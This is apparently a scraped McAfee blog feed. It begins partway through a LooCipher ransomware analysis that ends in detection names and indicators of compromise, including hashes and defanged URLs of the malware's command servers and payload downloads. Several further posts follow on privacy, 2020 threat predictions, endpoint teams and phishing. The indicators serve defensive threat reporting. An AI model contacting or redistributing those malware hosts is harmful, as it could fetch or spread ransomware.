The LooCipher authors provide a fallback mechanism to help victims access the instructions and the decryptor again, in case they close the LooCipher window when it appears in the system after encrypting the files:

The mechanism sees the LooCipher binary uploaded to the Mega platform. In case the user wants to get the BTC address or decrypt the files after making the payment, they can download this binary and use it. If the files were previously encrypted by LooCipher they would not be encrypted again according to the ransomware’s authors.

I’m Infected by LooCipher. How Can I Get my Files Back?

McAfee is one of the founders and contributors of the ‘No More Ransom’ project. One of our fellow stakeholders created a decryptor for all the files encrypted by LooCipher:

So, if you are infected with LooCipher, it is possible get your files back.

Conclusions:

LooCipher authors are not a sophisticated actor compared to other families like Ryuk, LockerGoga or REVil. They tried to spread their ransomware combining the infection with an Office file with a simple macro.

It will be impossible for the authors to come back to the scene if they do not change how the ransomware works.

The McAfee ATR Team advises against paying the ransomware demands and, instead, recommends:

  • Saving a copy of your encrypted files – sometimes in the future a decryptor may be released
  • Having a solid backup workflow in the company
  • Implementing best practices in terms of Cybersecurity

YARA Rule

We uploaded a YARA rule to detect almost all the samples observed in the wild.

MITRE ATT&CK Coverage:

  • Hooking
  • Defense Evasion
  • Network Service Scanning
  • System Information Discovery
  • Data Compressed

McAfee Coverage:

  • Artemis!02ACC0BC1446
  • Artemis!12AA5517CB7C
  • Artemis!1B1335F20CD0
  • Artemis!362AB3B56F40
  • Artemis!64FCC1942288
  • Artemis!8F421FE340E7
  • Artemis!983EF1609696
  • Artemis!A11724DBE1D6
  • Artemis!A7ABF760411F
  • Artemis!B9246AA9B474
  • Artemis!F0D98A6809C1
  • McAfee-Ransom-O
  • Ransomware-GNY!3B9A8D299B2A
  • Ransomware-GNY!66571E3C8036
  • Ransomware-GNY!9CF3C9E4A9B5
  • Ransomware-GNY!A0609D7AD404
  • Ransomware-GNY!A77FDEFE40BE
  • Ransomware-GNY!A9B6521FF980
  • Ransomware-GNY!D3CE02AD4D75
  • Ransomware-GNY!DC645F572D1F
  • RDN/Generic Downloader.x
  • RDN/Generic.ole

IOCs

e1200cb52d52855abfbc0c2dddefdf737fe187a8

b4380cc94fa7319877c381f76c260fcc4e3a7078

3aa1a0fa9db50294873335144b42562af23d7b27

7e1dc07f454cc615e36830a29e82694934840af0

bd430b7387f38c7126cd6e69fa638b437101f7de

49b86dd0a20e9a1c6ed5fd310507f4c3fe3930e0

86e72cfefde89c074f7ea5593818bc70e836ea4a

dc92d7fe3638632819b5895a7be9d474cfc90bd7

b11898dec3bcb95e0e152e938896be59ebf19544

35a91e97fc73c15d686ad78e05eff37eee7d25d3

2c781a50102725d42e7c61e56f336fc070f8f8d1

5e06c80c56e080f93d16edb7c0bed4b8aea8de2b

3d84f4091946b95ef1e9adb78b8c109925a31d32

50c4d99bd876f843833114887da4585563dd852f

674da4f22fcbbc28d8bb4c7f15b07a7ad3e32785

da1237ded3073e4c2e9ac840def641a37a3d13e5

365943cf84c05a8ff2f9b12fc1b79e4676914df0

3396d8f3195175196ba642c1d82b431ed2d9461a

10ce0d2f2cd0351ef6cac4b690c46b45b27652a1

44fccc7fac106aa8ff9e4244a255de9f55023da2

102318b5c8cd5464bfdd43c7108020e21f009c78

19d4708a9cd411c283992adf26ddf14a0c27e924

1e99e83d78df1bf1eeeb1d0df24a4680333c0ef7

0920d949ace0e1259bd0e035f450f9475c9f3a05

082e8ee73b6b1a828a299941bd1d65a259dbb71f

82c4bb136c75ec4e3a01693f0d1a930b4bf596e0

ecbee10531ab298a56606216d5a43078f7537c25

7720aa6eb206e589493e440fec8690ceef9e70b5e6712a9fec9208c03cac7ff0

35456dc5fdaf2281aad4d8f0441dcd0c715164e9d2ca6412380c2215ed2eab9c

3e8660f0d2b5b4c1c7dfb0d92f1198b65f263d36cd9964505f3a69150a729f6f

2ca214c271920c7261fc0009971961fa6d2ee4bd23820899f4d6e0679739bf2e

2ef92ced4c009fc20645c5602f0b1f2ddca464365b73b62eb0b7217f422590d5

77766f7f78e13dce382aeb4f89c13b9de12a2fa85f0a7550f4239dfe385a6fb5

8834001d7420d8caaa20cd429130249db30c81f0c5da92a2cb2da4dee6669c87

242f9a9cb23c87b6a5913731bce3f4e565f0393d95f2f9a78d675ef481578a61

7db9491697847dd0a65b719b0d836aeb28dec22a9deed57aa601f23a5b32214a

1f5d310da6f3f3a89e22fc86acb71741db56cbe85fbacc43822bec344cbe4058

893c4f7e3d8e9dc6757becbf2f20e81ec09557fc8e6ea72353c7b8984068f145

242198732eecc9c2d07d1db612b6084ece3a8d1d1b337554a7bef4216cbebccf

e209d7003a5d3674ab90fd1d082266a4aaa1bee144b04371abba0c358e95fd03

2a4ce9877a743865d6c11c13aa45da3683af223c196086984f57f3eff07cd3ea

0d72eab82635df496d20a8fb3921e33ed3aac597496cf006322eed48deb2c068

a6d23f11692e23a6c2307b9f5dd660bca3423f2f0202aa398325345f906b07b5

079d555a4935a6748d92e8bd9856ae11ecf4fd5293ed41cf318a407f9aaa6b2d

387be2e56804ed02ed6d4611d82c6f4b88953761d3961a33017adfb274e6cbfa

3e1d8a5faaa35e7f72ecad5f91644efd5bf0d92fdb0341c48a236c843c697196

0c42641fcc805c049883b9617082a8ac6d538fd87cfa371e3fef6114aff71c2a

b31d3de8ffd2b2dce2b570c0172f87a6719f01d4424a7a375bbb249cd15c1157

23b949ed81925ea3c10fa6c74b0d066172409e6a38023bd24672cc4efb47dd64

6987933482f12f0e1301bb0509a46f5889802fe481be160da9a29985acbabbd9

77d5586bc259e944634cff99912779fabfb356f6f840ea5afd6514f52562879d

177e91b5ac698542b5488a95a60816347fcba118f0ad43473aa7d2d5c9223847

0ffeb5639da6e77dfb241f1648fa8f9bac305335f7176def2b17e1b08706d49a

ad7eebdf328c7fd273b278b0ec95cb93bb3428d52f5ff3b69522f1f0b7e3e9a1

hxxps://hcwyo5rfapkytajg[.]tor2web[.]xyz/d[.]php

hxxps://hcwyo5rfapkytajg[.]onion[.]sh/d[.]php

hxxps://hcwyo5rfapkytajg[.]onion[.]ws/d[.]php

hxxps://hcwyo5rfapkytajg[.]tor2web[.]xyz/k[.]php

hxxps://hcwyo5rfapkytajg[.]onion[.]ws/k[.]php

hxxps://hcwyo5rfapkytajg[.]darknet[.]to/d[.]php

hxxps://hcwyo5rfapkytajg[.]onion[.]sh/k[.]php

hxxp://hcwyo5rfapkytajg[.]onion[.]pet/k[.]php

hxxps://hcwyo5rfapkytajg[.]darknet[.]to/k[.]php

hxxp://hcwyo5rfapkytajg[.]onion[.]pet/d[.]php

hcwyo5rfapkytajg[.]darknet[.]to

hcwyo5rfapkytajg[.]onion[.]sh

hcwyo5rfapkytajg[.]onion[.]ws

hcwyo5rfapkytajg[.]tor2web[.]xyz

hxxps://hcwyo5rfapkytajg[.]onion[.]sh/3agpke31mk[.]exe

hxxp://hcwyo5rfapkytajg[.]onion[.]pet/2hq68vxr3f[.]exe

hxxps://hcwyo5rfapkytajg[.]onion[.]sh/info_bsv_2019[.]docm

hxxps://hcwyo5rfapkytajg[.]onion[.]ws/3agpke31mk[.]exe

hxxps://hcwyo5rfapkytajg[.]darknet[.]to/2hq68vxr3f[.]exe

hxxp://hcwyo5rfapkytajg[.]onion[.]pet/info_project_bsv_2019[.]docm

hxxps://hcwyo5rfapkytajg[.]onion[.]ws/info_bsv_2019[.]docm

hxxps://hcwyo5rfapkytajg[.]tor2web[.]xyz/3agpke31mk[.]exe

hxxps://hcwyo5rfapkytajg[.]tor2web[.]xyz/info_bsv_2019[.]docm

hxxps://hcwyo5rfapkytajg[.]onion[.]sh/2hq68vxr3f[.]exe

hxxp://hcwyo5rfapkytajg[.]onion[.]pet/info_bsv_2019[.]docm

hxxp://hcwyo5rfapkytajg[.]onion[.]pet/3agpke31mk[.]exe

hxxps://hcwyo5rfapkytajg[.]darknet[.]to/info_bsv_2019[.]docm

hxxps://hcwyo5rfapkytajg[.]tor2web[.]xyz/2hq68vxr3f[.]exe

hxxps://hcwyo5rfapkytajg[.]onion[.]ws/2hq68vxr3f[.]exe

hxxps://hcwyo5rfapkytajg[.]darknet[.]to/3agpke31mk[.]exe

 

The post Analysis of LooCipher, a New Ransomware Family Observed This Year appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/analysis-of-loocipher-a-new-ransomware-family-observed-this-year/feed/ 0
Here’s What You Need to Know About Your Data Privacy in 2020 https://www.mcafee.com/blogs/consumer/consumer-threat-notices/data-privacy-predictions-2020/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/data-privacy-predictions-2020/#respond Thu, 05 Dec 2019 05:01:51 +0000 /blogs/?p=97731

The end of 2019 is rapidly approaching, and with the coming of a new year comes the perfect opportunity to reflect on the past and plan for the months ahead. What will 2020 bring when it comes to cybersecurity and what can users do to ensure that they’re protected in the upcoming year? From new […]

The post Here’s What You Need to Know About Your Data Privacy in 2020 appeared first on McAfee Blogs.

]]>

The end of 2019 is rapidly approaching, and with the coming of a new year comes the perfect opportunity to reflect on the past and plan for the months ahead. What will 2020 bring when it comes to cybersecurity and what can users do to ensure that they’re protected in the upcoming year? From new data privacy laws to how organizations collect and store user data, the new year will certainly bring plenty of security implications for users. Let’s take a look at a few predictions we have for the year to come.

More Awareness, More Regulations

After a security breach is disclosed, users often learn what can go wrong with their data and may start to wonder what will happen if their information gets into the wrong hands. That’s why new privacy laws will likely be implemented to empower users to better protect and control their data. For example, the new California privacy law set to go into effect January 2020 will allow consumers to instruct companies to delete their personal information and to opt-out of having their private data shared. These new regulations will allow users to better control their data and who has access to it. However, more regulations also create a more complicated landscape for individuals to navigate. Consumers will likely see more “consent” requests attached to any online data collection. That said, it is important to pay close attention to what consumers are agreeing to when they click “consent.”

With these new privacy laws, the method and level of transparency that organizations use to collect and store user data will likely come under scrutiny, particularly as data breaches become public. For example, companies make billions of dollars annually by buying and selling personal information that isn’t theirs to sell. The more data a company has on a user, the more insight cybercriminals have to infiltrate their digital life and trick them into sharing more information. 

New Tricks for the New Year

As more data is collected from various breaches, cybercriminals will look to leverage this information as a way to better understand which users to target and how exactly to target them. With the help of social engineering and artificial intelligence, these crooks will up the ante and turn old cyber tricks into sophisticated, unfamiliar threats. Take call spoofing, for example. By taking advantage of a user’s private data and new technology, cybercriminals could implement a fake call that appears to be coming from the user’s friend or family member. Because users are more likely to pick up a call from someone they know or a number that shares their same area code, cybercriminals increase the chances that their malicious attacks will be successful.

Dark Web Draws in More Data

With the number of breached records growing every day, users need to be aware of how crooks are leveraging this information in the cybercriminal underground and on the Dark Web. According to the McAfee Advanced Threat Research (ATR) team, more than 2.2 billion stolen account credentials were made available on the cybercriminal underground throughout Q1 2019 alone. This growing trend of personal online accounts being brokered on the Dark Web and the increasingly sophisticated threats that have recently emerged means that the 2019 holiday season could be the most dangerous yet.

With these predictions for the cybersecurity landscape in 2020, what resolutions can users make to help ensure that their data is protected? Follow these security tips to help safeguard your personal information:

  • Never reuse passwords. With just one hack, cybercriminals can get their hands on thousands of passwords, which they can then use to try to access multiple accounts. Ensure that all of your passwords are complex and unique.
  • Go directly to the source. Instead of clicking on a link in an email, it’s always best to check directly with the source to verify an offer or shipment.
  • Browse with security protection. Use a comprehensive security solution, like McAfee Total Protection, which can help protect devices against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor, which can help identify malicious websites.
  • Use a tool to help protect your personal information. A solution like McAfee Identity Theft Protection takes a proactive approach to help protect identities with personal and financial monitoring and recovery tools to help keep identities personal and secure.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Here’s What You Need to Know About Your Data Privacy in 2020 appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/data-privacy-predictions-2020/feed/ 0
McAfee Labs 2020 Threats Predictions Report https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-labs-2020-threats-predictions-report/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-labs-2020-threats-predictions-report/#respond Thu, 05 Dec 2019 05:01:14 +0000 /blogs/?p=97660

With 2019’s headlines of ransomware, malware, and RDP attacks almost behind us, we shift our focus to the cybercrime threats ahead. Cybercriminals are increasing the complexity and volume of their attacks and campaigns, always looking for ways to stay one step ahead of cybersecurity practices – and more often using the world’s evolving technology against […]

The post McAfee Labs 2020 Threats Predictions Report appeared first on McAfee Blogs.

]]>

With 2019’s headlines of ransomware, malware, and RDP attacks almost behind us, we shift our focus to the cybercrime threats ahead. Cybercriminals are increasing the complexity and volume of their attacks and campaigns, always looking for ways to stay one step ahead of cybersecurity practices – and more often using the world’s evolving technology against us.

Continuing advancements in artificial intelligence and machine learning have led to invaluable technological gains, but threat actors are also learning to leverage AI and ML in increasingly sinister ways. AI technology has extended the capabilities of producing convincing deepfake video to a less-skilled class of threat actor attempting to manipulate individual and public opinion. AI-driven facial recognition, a growing security asset, is also being used to produce deepfake media capable of fooling humans and machines.

Our researchers also foresee more threat actors targeting corporate networks to exfiltrate corporate information in two-stage ransomware campaigns.

With more and more enterprises adopting cloud services to accelerate their business and promote collaboration, the need for cloud security is greater than ever. As a result, the number of organizations prioritizing the adoption container technologies will likely continue to increase in 2020. Which products will they rely on to help reduce container-related risk and accelerate DevSecOps?

The increased adoption of robotic process automation and the growing importance to secure system accounts used for automation raises security concerns tied to Application Programming Interface (API) and their wealth of personal data.

The threatscape of 2020 and beyond promises to be interesting for the cybersecurity community.

–Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research

Twitter @Raj_Samani

Predictions

Broader Deepfakes Capabilities for Less-Skilled Threat Actors

Adversaries to Generate Deepfakes to Bypass Facial Recognition

Ransomware Attacks to Morph into Two-Stage Extortion Campaigns

Application Programming Interfaces (API) Will be Exposed as The Weakest Link Leading to Cloud-Native Threats

DevSecOps Will Rise to Prominence as Growth in Containerized Workloads Causes Security Controls to ‘Shift Left’

Broader Deepfakes Capabilities for Less-skilled Threat Actors

By Steve Grobman

The ability to create manipulated content is not new. Manipulated images were used as far back as World War II in campaigns designed to make people believe things that weren’t true. What’s changed with the advances in artificial intelligence is you can now build a very convincing deepfake without being an expert in technology. There are websites set up where you can upload a video and receive in return, a deepfake video. There are very compelling capabilities in the public domain that can deliver both deepfake audio and video abilities to hundreds of thousands of potential threats actors with the skills to create persuasive phony content.

Deepfake video or text can be weaponized to enhance information warfare. Freely available video of public comments can be used to train a machine-learning model that can develop a deepfake video depicting one person’s words coming out of another’s mouth. Attackers can now create automated, targeted content to increase the probability that an individual or groups fall for a campaign. In this way, AI and machine learning can be combined to create massive chaos.

In general, adversaries are going to use the best technology to accomplish their goals, so if we think about nation-state actors attempting to manipulate an election, using deepfake video to manipulate an audience makes a lot of sense. Adversaries will try to create wedges and divides in society, or if a cybercriminal can have a CEO make what appears to be a compelling statement that a company missed earnings or that there’s a fatal flaw in a product that’s going to require a massive recall. Such a video can be distributed to manipulate a stock price or enable other financial crimes

We predict the ability of an untrained class to create deepfakes will enhance an increase in quantity of misinformation.

Adversaries to Generate Deepfakes to Bypass Facial Recognition

By Steve Povolny

Computer-based facial recognition, in its earliest forms, has been around since the mid-1960s. While dramatic changes have since taken place, the underlying concept remains: it provides a means for a computer to identify or verify a face. There are many use cases for the technology, most related to authentication and to answer a single question: is this person who they claim to be?

As time moves onwards, the pace of technology has brought increased processing power, memory and storage to facial recognition technology. New products have leveraged facial recognition in innovative ways to simplify everyday life, from unlocking smart phones, to passport ID verification in airports, and even as a law enforcement aid to identify criminals on the street.

One of the most prevalent enhancements to facial recognition is the advancement of artificial intelligence (AI). A recent manifestation of this is deepfakes, an AI-driven technique producing extremely realistic text, images, and videos that are difficult for humans to discern real from fake. Primarily used for the spread of misinformation, the technology leverages capabilities. Generative Adversarial Networks (GANs), a recent analytic technology, that on the downside, can create fake but incredibly realistic images, text, and videos. Enhanced computers can rapidly process numerous biometrics of a face, and mathematically build or classify human features, among many other applications. While the technical benefits are impressive, underlying flaws inherent in all types of models represent a rapidly growing threat, which cyber criminals will look to exploit.

As technologies are adopted over the coming years, a very viable threat vector will emerge, and we predict adversaries will begin to generate deepfakes to bypass facial recognition. It will be critical for businesses to understand the security risks presented by facial recognition and other biometric systems and invest in educating themselves of the risks as well as hardening critical systems.

Ransomware Attacks to Morph into Two-Stage Extortion Campaigns

By John Fokker

In McAfee’s 2019 threat predictions report, we predicted cyber criminals would partner more closely to boost threats; over the course of the year, we observed exactly that. Ransomware groups used pre-infected machines from other malware campaigns, or used remote desktop protocol (RDP) as an initial launch point for their campaign. These types of attacks required collaboration between groups. This partnership drove efficient, targeted attacks which increased profitability and caused more economic damage. In fact,  Europol’s Internet Organised Crime Threat Assessment (IOCTA),  named ransomware the top threat that companies, consumers, and the public sector faced in 2019.

Based on what McAfee Advanced Threat Research (ATR) is seeing in the underground, we expect criminals to exploit their extortion victims even more moving forward. The rise of targeted ransomware created a growing demand for compromised corporate networks. This demand is met by criminals who specialize in penetrating corporate networks and sell complete network access in one-go.

Here are examples of underground ads offering access to businesses:

Figure 1 RDP access to a Canadian factory is being offered

Figure 2 Access to an Asian Food, Consumer and Industrial company being offered

For 2020, we predict the targeted penetration of corporate networks will continue to grow and ultimately give way to two-stage extortion attacks. In the first stage cybercriminals will deliver a crippling ransomware attack, extorting victims to get their files back. In the second stage criminals will target the recovering ransomware victims again with an extortion attack, but this time they will threaten to disclose the sensitive data stolen before the ransomware attack.

During our research on Sodinobiki we observed two-stage attacks, with cryptocurrency miners installed before an actual ransomware attack took place. For 2020, we predict that cybercriminals will increasingly exfiltrate sensitive corporate information prior to a targeted ransomware attack to sell the stolen data online or to extort the victim and increase monetization.

Application Programming Interfaces (API) Will Be Exposed as The Weakest Link Leading to Cloud-Native Threats

By Sekhar Sarukkai

A recent study showed that more than three in four organizations treat API security differently than web app security, indicating API security readiness lags behind other aspects of application security. The study also showed that more than two-thirds of organizations expose APIs to the public to enable partners and external developers to tap into their software platforms and app ecosystems.

APIs are an essential tool in today’s app ecosystem including cloud environments, IoT, microservices, mobile, and Web-based customer-client communications. Dependence on APIs will further accelerate with a growing ecosystem of cloud applications built as reusable components for back-office automation (such as with Robotic Process Automation) and growth in the ecosystem of applications that leverage APIs of cloud services such as Office 365 and Salesforce.

Threat actors are following the growing number of organizations using API-enabled apps because APIs continue to be an easy – and vulnerable – means to access a treasure trove of sensitive data. Despite the fallout of large-scale breaches and ongoing threats, APIs often still reside outside of the application security infrastructure and are ignored by security processes and teams. Vulnerabilities will continue to include broken authorization and authentication functions, excessive data exposure, and a failure to focus on rate limiting and resource limiting attacks. Insecure consumption-based APIs without strict rate limits are among the most vulnerable.

Headlines reporting API-based breaches will continue into 2020, affecting high-profile apps in social media, peer-to-peer, messaging, financial processes, and others, adding to the hundreds of millions of transactions and user profiles that have been scraped in the past two years. The increasing need and hurried pace of organizations adopting APIs for their applications in 2020 will expose API security as the weakest link leading to cloud-native threats, putting user privacy and data at risk until security strategies mature.

Organizations seeking improvement in their API security strategy should pursue a more complete understanding of their Cloud Service APIs through comprehensive discovery across SaaS, PaaS and IaaS environments, implement policy-based authorization, and explore User and Entity Behavior Analytics (UEBA) technology to detect anomalous access patterns.

 

DevSecOps Will Rise to Prominence as Growth in Containerized Workloads Causes Security Controls to ‘Shift Left’

 By Sekhar Sarukkai

DevOps teams can continuously roll out micro-services and interacting, reusable components as applications. As a result, the number of organizations prioritizing the adoption of container technologies will continue to increase in 2020. Gartner predicts that “by 2022, more than 75 percent of global organizations will be running containerized applications in production – a significant increase from fewer than 30 percent today.” 1 Container technologies will help organizations modernize legacy applications and create new cloud-native applications that are scalable and agile.

Containerized applications are built by assembling reusable components on software defined Infrastructure-as-Code (IaC) which is deployed into Cloud environments. Continuous Integration / Continuous Deployment (CI/CD) tools automate the build and deploy process of these applications and IaC, creating a challenge for pre-emptive and continuous detection of application vulnerabilities and IaC configuration errors. To adjust to the rise in containerized applications operating in a CI/CD model, security teams will need to conduct their risk assessment at the time of code build, before deployment. This effectively shifts security “left” in the deployment lifecycle and integrates security into the DevOps process, a model frequently referred to as DevSecOps.

Additionally, threats to containerized applications are introduced nor only by IaC misconfigurations or application vulnerabilities, but also abused network privileges which allow lateral movement in an attack. To address these run-time threats, organizations are increasingly turning to cloud-native security tools developed specifically for container environments. Cloud Access Security Brokers (CASB) are used to conduct configuration and vulnerability scanning, while Cloud Workload Protection Platforms (CWPP) work as traffic enforcers for network micro-segmentation based on the identity of the application, regardless of its IP. This approach to application identity-based enforcement will push organizations away from the five-tuple approach to network security which is increasingly irrelevant in the context of ephemeral container deployments.

When CASB and CWPP solutions integrate with CI/CD tools, security teams can meet the speed of DevOps, shifting security “left” and creating a DevSecOps practice within their organization.  Governance, compliance, and overall security of cloud environments will improve as organizations accelerate their transition to DevSecOps with these cloud-native security tools.

 

Gartner Best Practices for Running Containers and Kubernetes in Production, Arun Chandrasekaran, 25 February 2019

The post McAfee Labs 2020 Threats Predictions Report appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-labs-2020-threats-predictions-report/feed/ 0
Endpoint Security 301: When Products, Policies, and People Break Down the Lines of Communication https://www.mcafee.com/blogs/enterprise/endpoint-security/endpoint-security-301-what-to-do-when-products-policies-and-people-break-down-the-lines-of-communication/ https://www.mcafee.com/blogs/enterprise/endpoint-security/endpoint-security-301-what-to-do-when-products-policies-and-people-break-down-the-lines-of-communication/#respond Wed, 04 Dec 2019 16:00:05 +0000 /blogs/?p=97654

Security architecture is like the ocean: no one owns it, and it is constantly affected by change. New technologies are introduced, staff changes occur, and as a result, communication suffers. I often see environments where ownership is placed into silos across teams in the enterprise, meaning IT administrators preventing threats may not get the insights […]

The post Endpoint Security 301: When Products, Policies, and People Break Down the Lines of Communication appeared first on McAfee Blogs.

]]>

Security architecture is like the ocean: no one owns it, and it is constantly affected by change. New technologies are introduced, staff changes occur, and as a result, communication suffers. I often see environments where ownership is placed into silos across teams in the enterprise, meaning IT administrators preventing threats may not get the insights uncovered by security operations teams. On the other hand, SecOps may not receive details on why a policy or configuration change has occurred. What’s more, in environments without effective integration between security tools, this lack of communication means the insights and visibilities that might benefit other stakeholders rarely travel or surface outside the immediate security team.

Add into the mix a pool of security tools that can’t co-exist — or who do so poorly in a way that causes conflicts with the other — and the situation is complicated even further. Clearly, implementing an effective, comprehensive endpoint strategy is one challenge, but maintaining that strategy is usually where the real battle begins.

A crucial part of winning this battle is ensuring that IT security administrators and SecOps work together effectively. Let’s examine how these two can do so to ensure all bases and endpoints are covered.

A Lack of Alignment Exacerbates the Skills Gap

A quick reminder: IT security teams are responsible for the health of the network and IT infrastructure, requiring them to focus on access controls, endpoint protection, and vulnerability management. SecOps teams, meanwhile, establish the rules their organization must follow to secure their environment.

Logically, these teams should work hand-in-hand, but in most enterprises, they are siloed due to functional or technical limits. Each has little visibility into what the other side is doing on a day-to-day basis, plus a complete lack of insight into longer-term strategic security initiatives. This can lead to a breakdown in rules, configurations, and escalations that has a detrimental impact on an enterprises’ infrastructure.

Lack of communication can also make it hard for IT security admins to know how to escalate and prioritize issues, as well as prevents SecOps from upskilling. For example, junior analysts can only address about 30% of alerts today. The remainder of alerts require a higher skill set to remediate, a problem that’s only compounded by the lack of qualified cybersecurity talent. In fact, some estimates expect the number of unfilled cybersecurity jobs to rise to 3.5 million by 2021, and because many SecOps tools today require significant experience to operate, communication and education will only become more critical.

Establishing Shared Visibility Between Teams

Now that we know the issues that can arise when SecOps and IT admins don’t communicate, let’s address some of the solutions and outcomes. It all starts with better, shared visibility. When each team has insight into what the other is working on, teams are no longer siloed, and less time is spent on alerts and false positives that frontline IT can handle rather than SecOps. This means that if an eventual hack or breach does occur, more time and effort can be spent on threat remediation in order to strengthen an enterprise’s endpoint environment.

Shared visibility extends into joint policy creation as well. When forming policies, if IT admins and SecOps provide their respective input, there is less of a chance of miscommunication or misconfiguration. Policy changes can be understood from the get-go by forming a holistic approach, with the necessary expertise and insights from both teams coming together to create an overarching endpoint security strategy that’s more secure.

SecOps and IT must also find a way to extend that visibility to new team members. In my experience, solving security architecture issues requires a two-pronged approach. First, the security industry should take more responsibility for designing products usable by both the most advanced security professionals and operational staff and analysts. But second, organizations must ensure that a lack of continuity at customer sites from staff rotations is maintained through documented policies to support product configurations. In other words, organizations must ensure the appropriate processes are in place to support the security tools they deploy. This historical knowledge matters because, anecdotally,I find that a significant number of escalations are addressable simply by reverting a customer environment back to default settings. New employees are unaware of this quick fix and therefore waste precious time and resources on unnecessary efforts.

Collaborating for True Endpoint Security

With these challenges in mind, we recommend the following steps.

  • Create visible, documented policies for all products and scenarios. This helps overcome a lack of communication, staff turnover, and the inability of products to integrate.
  • Conversely, seek integration and automation. And in fact, organizations are doing so, with over 70% pursuing increased automation in endpoint security, including automated detection and response.
  • Establish cross-functional collaboration in other ways. For example, require IT admins to flag threats to SecOps.
  • Review your policy book and guidelines quarterly so that the latest technology and processes can be effectively integrated into guidelines.

IT security admins and SecOps teams don’t have to — and shouldn’t — do their jobs alone. To cover all bases, they can leverage a multitude of endpoint security solutions with proactive, collaborative, and integrated technology built in. These solutions allow IT security admins and SecOps teams to focus their efforts elsewhere, such as on strategic projects, policies, and insights.

McAfee MVISION Endpoint and MVISION Mobile, for example, build machine learning (ML) algorithms and analysis into their architecture to help monitor and identify malicious behavior. Additionally, McAfee Endpoint Detection & Response combines real-time endpoint monitoring and data collection with rules-based automated response and analysis capabilities so that both IT security and SecOps can be involved in the process of fostering effective enterprise endpoint security in a way that makes both of their jobs easier.

With the proper visibility between IT security and SecOps teams, advanced security solutions not only bring an endpoint security strategy full circle but also allow for more time to be spent on collaboration and teamwork. An endpoint security strategy is only as strong as its weakest link – human, solution, or otherwise. Enterprises should ensure that their weakest link isn’t a vulnerable missing link between IT admins and SecOps.

To learn more about effective endpoint security strategy, be sure to follow us @McAfee and @McAfee_Business.

 

The post Endpoint Security 301: When Products, Policies, and People Break Down the Lines of Communication appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/endpoint-security/endpoint-security-301-what-to-do-when-products-policies-and-people-break-down-the-lines-of-communication/feed/ 0
McAfee Up Levels Insights for Customers https://www.mcafee.com/blogs/enterprise/mcafee-up-levels-insights-for-customers/ https://www.mcafee.com/blogs/enterprise/mcafee-up-levels-insights-for-customers/#respond Tue, 03 Dec 2019 17:16:54 +0000 /blogs/?p=97690

Authored by Anand Ramanathan McAfee recently announced MVISION Insights designed to help customers proactively detect, rank and respond quickly and accurately to threats. On top of having to respond to threats that persistently target their companies, security professionals also face another huge challenge – prioritizing what threat information is relevant from the huge volume of […]

The post McAfee Up Levels Insights for Customers appeared first on McAfee Blogs.

]]>

Authored by Anand Ramanathan

McAfee recently announced MVISION Insights designed to help customers proactively detect, rank and respond quickly and accurately to threats.

On top of having to respond to threats that persistently target their companies, security professionals also face another huge challenge – prioritizing what threat information is relevant from the huge volume of data being presented to them. At McAfee we know how critical time optimization has become to security. So, we are focusing as a team on helping customers not only identify and report on the threats that pose a risk to businesses at large, but also have intelligent insights so they can prioritize information and take action to allocate resources when and where it really matters.

To deliver these insights, we are continually innovating our products and services, and part of that innovation means looking outside of McAfee to bring in the best technologies for our products. For this initiative, this meant adding a leader in security analytics and graph theory, Uplevel, to the McAfee family. Uplevel’s graph analysis platform will allow our customers to more quickly understand the threats that they’re facing and effectively select the right course of action. Combined with McAfee’s world-class data lake, we’re aiming to help our customers have the most comprehensive review of threats and their risk.

In addition to the technology, the Uplevel team led by Liz Maida brings a wealth of experience to McAfee, and specifically the Enterprise Security Business Unit. Liz’s ability to identify pain points for companies and develop solutions that address these will be instrumental in the future development of McAfee technologies and services.

Bringing Uplevel into the McAfee family – along with other recent acquisitions  – demonstrates McAfee’s commitment to innovation that will allow us to be the best device-to-cloud cybersecurity company for our customers and partners.

The post McAfee Up Levels Insights for Customers appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/mcafee-up-levels-insights-for-customers/feed/ 0
Are All Phishing Scams Easy to Spot? https://www.mcafee.com/blogs/consumer/hackable/are-all-phishing-scams-easy-to-spot/ https://www.mcafee.com/blogs/consumer/hackable/are-all-phishing-scams-easy-to-spot/#respond Tue, 03 Dec 2019 17:09:24 +0000 /blogs/?p=97684

The number of phishing scams that hide malware or malicious links is on the rise for a simple reason: they still work because people are the weakest link of any cybersecurity system. Some schemes are a numbers game — a hacker sends out thousands of emails to random people with the hope of getting a […]

The post Are All Phishing Scams Easy to Spot? appeared first on McAfee Blogs.

]]>

The number of phishing scams that hide malware or malicious links is on the rise for a simple reason: they still work because people are the weakest link of any cybersecurity system. Some schemes are a numbers game — a hacker sends out thousands of emails to random people with the hope of getting a few to click. Others are highly-targeted, spear-phishing attacks that involve gathering information about a single person so that the hacker can exploit a very specific vulnerability.

On the latest episode of “Hackable?” we find out just how hackers go spear-phishing when our cybersecurity expert Bruce Snell creates his own scheme. His target? Who else but producer Pedro Mendes. Listen and learn whether or not Pedro clicks, and how you can help protect your data and devices.

Listen to “Hackable?” today.

The post Are All Phishing Scams Easy to Spot? appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/hackable/are-all-phishing-scams-easy-to-spot/feed/ 0
Cybersecurity & Artificial Intelligence (AI) – a view from the EU Rear Window, Part I https://www.mcafee.com/blogs/enterprise/data-security/cybersecurity-artificial-intelligence-ai-a-view-from-the-eu-rear-window-part-i/ https://www.mcafee.com/blogs/enterprise/data-security/cybersecurity-artificial-intelligence-ai-a-view-from-the-eu-rear-window-part-i/#comments Mon, 02 Dec 2019 17:50:12 +0000 /blogs/?p=97656

